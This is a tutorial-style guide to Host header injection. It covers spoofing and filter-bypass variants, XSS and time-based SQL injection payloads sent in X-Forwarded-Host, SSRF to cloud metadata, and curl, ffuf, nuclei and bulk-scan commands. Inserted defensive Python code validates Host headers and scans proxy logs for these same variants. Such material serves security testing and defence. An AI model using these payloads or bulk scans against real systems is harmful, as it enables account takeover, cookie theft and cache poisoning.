Host Header Injection Guide

Comprehensive guide to Host header manipulation techniques, from basic spoofing to advanced SSRF and DNS rebinding attacks.

Phase 0

Vulnerability Description

1. What is Host Header Injection?
Host Header Injection: a web vulnerability that arises when an application trusts the Host header without validating it.
2. Core mechanism of the attack
The attacker modifies the Host header so the server believes it is handling a request for a different domain.
3. Primary impacts
Impacts: Cache Poisoning, Password Reset Poisoning, Open Redirects, bypass of security controls.
4. Most critical impact
Severe cases: full Account Takeover.
Phase 1

Common 1: Spoofing with Malicious Domain (Most Common)

1. Purpose: Make the application generate links pointing to the attacker's server
GET /reset-password HTTP/1.1
Host: attacker.com
Phase 2

Common 2: Adding a Prefix

1. Purpose: Bypass filters that only check for the main domain
GET /admin.php HTTP/1.1
Host: attackertarget.com
Phase 3

Common 3: Absolute URL in Host

1. Purpose: Trick URL generation and parsing logic
GET /admin.php HTTP/1.1
Host: https://target.com/admin.php
Phase 4

Common 4: Subdomain Bypass

1. Purpose: Bypass simple validation that looks only for the main domain
GET /admin.php HTTP/1.1
Host: subdomain.target.com
Phase 5

Common 5: Leading Space / Tab

1. Purpose: Exploit parsing inconsistencies in servers or proxies
GET /admin.php HTTP/1.1
Host: target.com
Phase 6

Common 6: Different Port

1. Purpose: Bypass port-based access controls
GET /admin.php HTTP/1.1
Host: target.com:8080
Phase 7

Common 7: X-Forwarded-Host (Very Important)

1. Purpose: Many apps/proxies trust X-Forwarded-Host over the Host header
GET /admin.php HTTP/1.1
X-Forwarded-Host: attacker.com
Phase 8

Common 8: Blank Host Header

1. Purpose: Some servers default to the first virtual host when Host is empty
GET /admin.php HTTP/1.1
Host:
Phase 9

Common 9: Multiple Host Headers

1. Purpose: Exploit inconsistencies between frontend/backend parsing
GET /admin.php HTTP/1.1
Host: target.com
Host: attacker.com
Phase 10

Common 10: Using Server IP

1. Purpose: Bypass virtual host routing or access controls by using the IP address
GET /admin.php HTTP/1.1
Host: 192.0.2.1
Advanced 11

Advanced 1: Special Characters & Null Byte

1. Purpose: Bypass filters using null bytes or special characters
Host: target.com%00.attacker.com
Advanced 12

Advanced 2: Path Traversal in Host

1. Purpose: Exploit misconfigured apps that parse the host as part of the path
Host: ../../attacker.com
Advanced 13

Advanced 3: Encoded Host

1. Purpose: Bypass validation using URL-encoded values
Host: %74%61%72%67%65%74.com
Advanced 14

Advanced 4: XSS via X-Forwarded-Host

1. Purpose: Inject an XSS payload via the X-Forwarded-Host header
X-Forwarded-Host: evil.com"><img src=x onerror=prompt(document.cookie)>
Advanced 15

Advanced 5: SQL Injection via X-Forwarded-Host

1. Purpose: Inject a SQL payload via the X-Forwarded-Host header
X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Advanced 16

Advanced 6: SSRF via Host Header

1. Purpose: Reach internal services via Host header manipulation
Host: internal-service.local
2. Use case: SSRF to cloud metadata services
Target internal AWS metadata: Host: 169.254.169.254
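The counterpart to the Common 1 through 10 and Advanced 1 through 6 variants above is a server-side allowlist check that refuses every one of them instead of trying to normalise them. The following is an added example written for this page, not code from the original page or from any project it mentions; ALLOWED_HOSTS, ALLOWED_PORTS, CANONICAL_ORIGIN and the (name, value) header representation are assumptions standing in for application configuration and framework plumbing.

```python
"""Server-side Host header allowlist check (added example, not code from the page).

Assumptions: ALLOWED_HOSTS, ALLOWED_PORTS and CANONICAL_ORIGIN stand in for
application configuration; a request's headers are passed as a list of
(name, value) tuples in the order received, duplicates preserved.
"""
import re

ALLOWED_HOSTS = {"target.com", "www.target.com"}   # constructed allowlist
ALLOWED_PORTS = {None, 443}                          # None = no explicit port given
CANONICAL_ORIGIN = "https://target.com"              # origin used for links in e-mails

# A hostname made of DNS labels, optionally followed by a decimal port. Anything
# else (scheme, path, '%', '@', brackets, whitespace) fails to match.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"^(?P<host>{_LABEL}(?:\.{_LABEL})*)(?::(?P<port>\d{{1,5}}))?$")


def host_headers(headers):
    """All Host header values in the request; header names are case-insensitive."""
    return [v for n, v in headers if n.lower() == "host"]


def validate_host(headers):
    """Return the lower-case hostname if the request's Host header is acceptable, else None.

    Every check runs on the raw value the client sent. Nothing is trimmed or
    percent-decoded before the allowlist comparison, so padded or encoded
    values fail instead of being normalised into something that passes.
    """
    values = host_headers(headers)
    if len(values) != 1:                         # missing or duplicated Host header
        return None
    raw = values[0]
    if raw == "" or raw != raw.strip():          # blank value, leading/trailing space or tab
        return None
    if any(not (0x21 <= ord(c) <= 0x7E) for c in raw):  # NUL, other control bytes, non-ASCII
        return None
    m = _HOST_RE.match(raw.lower())
    if m is None:                                # absolute URL, path segments, percent-encoding, ...
        return None
    host = m.group("host")
    port = int(m.group("port")) if m.group("port") else None
    if host not in ALLOWED_HOSTS:                # exact match only: no prefix, subdomain or IP variants
        return None
    if port not in ALLOWED_PORTS:                # e.g. target.com:8080 is refused
        return None
    return host


def effective_host(headers, from_trusted_proxy=False):
    """Resolve the host the application should act on.

    X-Forwarded-Host is honoured only when the caller has established, from the
    TCP peer address and not from any header, that the request came through a
    trusted reverse proxy, and even then it goes through the same allowlist.
    From anyone else the header is ignored entirely.
    """
    if from_trusted_proxy:
        forwarded = [v for n, v in headers if n.lower() == "x-forwarded-host"]
        if len(forwarded) > 1:                   # ambiguous: refuse rather than pick one
            return None
        if forwarded:
            return validate_host([("Host", forwarded[0])])
    return validate_host(headers)


def password_reset_link(token, headers):
    """Build the reset URL from configuration; the request's Host never reaches the link."""
    if validate_host(headers) is None:
        raise ValueError("request rejected: unacceptable Host header")
    return f"{CANONICAL_ORIGIN}/reset-password?token={token}"


if __name__ == "__main__":
    # Constructed samples mirroring the variants listed above.
    for value in ["target.com", "attacker.com", "attackertarget.com",
                  "https://target.com/admin.php", "subdomain.target.com",
                  " target.com", "target.com:8080", "", "192.0.2.1",
                  "target.com%00.attacker.com", "../../attacker.com",
                  "%74%61%72%67%65%74.com", "169.254.169.254"]:
        print(f"{value!r:36} -> {validate_host([('Host', value)])}")
    print("duplicate Host ->", validate_host([("Host", "target.com"), ("Host", "attacker.com")]))
```

The design choice worth noting is that the function never "cleans" the header: a value with a leading tab, a percent-encoded label or a second Host header is rejected as received, which removes the class of bugs where the validator and the downstream consumer normalise differently. Links that end up in e-mails are built from CANONICAL_ORIGIN, so even a request that slipped past a proxy cannot steer the reset link.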
Phase 17

Tool 1: cURL (Best for Manual Testing)

#1 Test Host header injection manually
curl -I -H "Host: attacker.com" https://target.com
#2 Test X-Forwarded-Host injection manually
curl -I -H "X-Forwarded-Host: attacker.com" https://target.com
Phase 18

Tool 2: Ffuf (Brute Force Domains)

1. Fuzz Host header values with a wordlist, match 200 status
ffuf -u https://target.com -H "Host: FUZZ" -w hosts.txt -mc 200
Phase 19

Tool 3: Nuclei (Automated Scanning)

1. Fast automated vulnerability scanning with Nuclei templates
nuclei -u https://target.com -t x-forwarded.yaml
2. CoffinXP Nuclei template for X-Forwarded-Host testing
https://github.com/coffinxp/nuclei-templates/blob/main/x-forwarded.yaml
Phase 20

Tool 4: Gau + Curl (Bulk Testing)

1. Test multiple domains with a custom Host header in bulk (read -r keeps backslashes in URLs intact)
cat domains.txt | while read -r url; do echo "[*] Testing $url"; curl -sk -H "Host: attacker.com" "$url" -I; done
Impact 21

Real-World Impact

#1: Cache Poisoning → Affects all users
Attackers poison a shared cache to serve malicious content to all users
#2: Password Reset Poisoning → Account theft
The victim receives a password reset link pointing to the attacker's server
#3: Open Redirects
Abuse of the Host header to redirect users to phishing sites
#4: Bypassing IP/Host-based Access Controls
Access to admin panels or internal APIs via Host header manipulation
#5: SSRF to internal services
Chained with SSRF to reach internal metadata services or APIs
#6: XSS & SQLi in some cases
Header injection that leads to injection vulnerabilities
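On the detection side, the impacts listed above all leave a trace in reverse-proxy access logs: a Host value outside the allowlist, an X-Forwarded-Host header arriving from an ordinary client, or a non-standard port, and the damage case is when such a request was served with 200 on a password-reset or admin path rather than refused. The following detection pass is an added example written for this page, not code from the original page or any project; the JSON log format, its field names (ts, src, method, path, host, xfh, status), the sample lines and SENSITIVE_PATHS are all constructed assumptions.

```python
"""Detection pass over reverse-proxy access logs (added example, not from the page).

Assumptions: the proxy logs one JSON object per line with the constructed field
names below (ts, src, method, path, host, xfh, status); ALLOWED_HOSTS and
SENSITIVE_PATHS stand in for deployment configuration.
"""
import json
from collections import Counter

ALLOWED_HOSTS = {"target.com", "www.target.com"}
SENSITIVE_PATHS = ("/reset-password", "/admin")   # where a poisoned Host does real damage

# Constructed sample log lines: one benign client (198.51.100.7) and one
# probing client (203.0.113.9) trying the Host variants covered earlier.
SAMPLE_LOG = """\
{"ts":"2024-05-01T10:00:01Z","src":"198.51.100.7","method":"GET","path":"/reset-password","host":"target.com","xfh":null,"status":200}
{"ts":"2024-05-01T10:00:02Z","src":"203.0.113.9","method":"GET","path":"/reset-password","host":"attacker.com","xfh":null,"status":200}
{"ts":"2024-05-01T10:00:03Z","src":"203.0.113.9","method":"GET","path":"/admin.php","host":"target.com","xfh":"attacker.com","status":200}
{"ts":"2024-05-01T10:00:04Z","src":"203.0.113.9","method":"GET","path":"/admin.php","host":"target.com:8080","xfh":null,"status":403}
{"ts":"2024-05-01T10:00:05Z","src":"198.51.100.7","method":"GET","path":"/","host":"www.target.com","xfh":null,"status":200}
{"ts":"2024-05-01T10:00:06Z","src":"203.0.113.9","method":"GET","path":"/","host":"192.0.2.1","xfh":null,"status":200}
"""


def host_port(value):
    """Split a logged 'host[:port]' field; lower-cased so comparisons are case-insensitive."""
    value = (value or "").strip().lower()
    host, _, port = value.partition(":")
    return host, (port or None)


def classify(entry):
    """Indicator names for one parsed log entry; an empty list means nothing suspicious."""
    reasons = []
    host, port = host_port(entry.get("host"))
    if host not in ALLOWED_HOSTS:
        reasons.append("host_not_allowlisted")
    if port is not None and port != "443":
        reasons.append("unexpected_port")
    xfh = entry.get("xfh")
    if xfh:                                   # clients have no business sending this header
        reasons.append("x_forwarded_host_present")
        if host_port(xfh)[0] != host:
            reasons.append("x_forwarded_host_mismatch")
    # Escalate when the request was actually served on a path where a spoofed
    # host ends up in e-mails or grants access, rather than being refused.
    if reasons and entry.get("status") == 200 and entry.get("path", "").startswith(SENSITIVE_PATHS):
        reasons.append("served_200_on_sensitive_path")
    return reasons


def scan(log_text):
    """Parse JSON lines and return one finding per suspicious entry (line number, source, path, reasons)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            findings.append({"line": lineno, "src": None, "path": None, "reasons": ["unparseable_line"]})
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"line": lineno, "src": entry.get("src"), "path": entry.get("path"), "reasons": reasons})
    return findings


def offenders(findings, threshold=2):
    """Source addresses with at least `threshold` flagged requests, most active first."""
    counts = Counter(f["src"] for f in findings if f["src"])
    return [(src, n) for src, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>2}  {f['src']:<14} {f['path']:<16} {', '.join(f['reasons'])}")
    print("repeat offenders:", offenders(found))
```

Run as a script it prints the four flagged lines and names 203.0.113.9 as the repeat source. The `served_200_on_sensitive_path` indicator is the one worth paging on: a probe that got a 403 is noise, whereas a 200 on /reset-password with a foreign Host means the application may already have mailed a poisoned link.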
Phase 22

Vulnerability Types Classification

Type             | Main Usage                     | Difficulty | Level
Basic Spoofing   | Changing links & emails        | Easy       | Entry level - start here
Filter Bypass    | Null byte, Encoding, Prefix    | Medium     | Intermediate - when basic methods are blocked
Header Smuggling | Multiple Host, Leading Space   | Medium     | Intermediate - exploit parsing inconsistencies
Advanced Attacks | SSRF, XSS, SQLi, DNS Rebinding | Advanced   | Expert level - chain multiple techniques
Phase 23

Practical Tip

1. Step 1: Basic testing with a common attacker domain
Always start with Host and X-Forwarded-Host using attacker.com
2. Step 2: Apply filter evasion techniques when basic methods fail
If blocked, try bypass techniques (Null Byte, Encoding, Multiple Headers)
Tools

Tools & Resources